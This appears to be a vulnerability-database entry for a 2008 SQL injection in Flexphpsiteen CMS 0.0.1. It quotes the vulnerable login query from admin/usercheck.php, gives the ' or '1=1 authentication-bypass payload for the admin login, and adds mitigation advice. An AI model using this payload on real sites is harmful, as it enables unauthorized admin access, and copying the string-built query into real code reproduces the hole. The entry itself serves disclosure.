header-logo
Suggest Exploit
vendor:
Flexphpsiteen CMS
by:
x0r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Flexphpsiteen CMS
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Flexphpsiteen CMS SQL Injection Vulnerability

The vulnerability exists in the usercheck.php file of the Flexphpsiteen CMS. By manipulating the 'username' and 'password' parameters, an attacker can inject malicious SQL code and bypass authentication. The provided exploit code demonstrates the use of a common SQL injection technique by using the payload ' or '1=1' to always evaluate to true, granting unauthorized access to the admin panel.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks. It is recommended to update to a patched version of the CMS if available.
Source

Exploit-DB raw data:

#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphpsiteen
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpsite/downloads.html
##############################################

Bug In \admin\usercheck.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";

Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Greetz: Anna <3

# milw0rm.com [2008-12-29]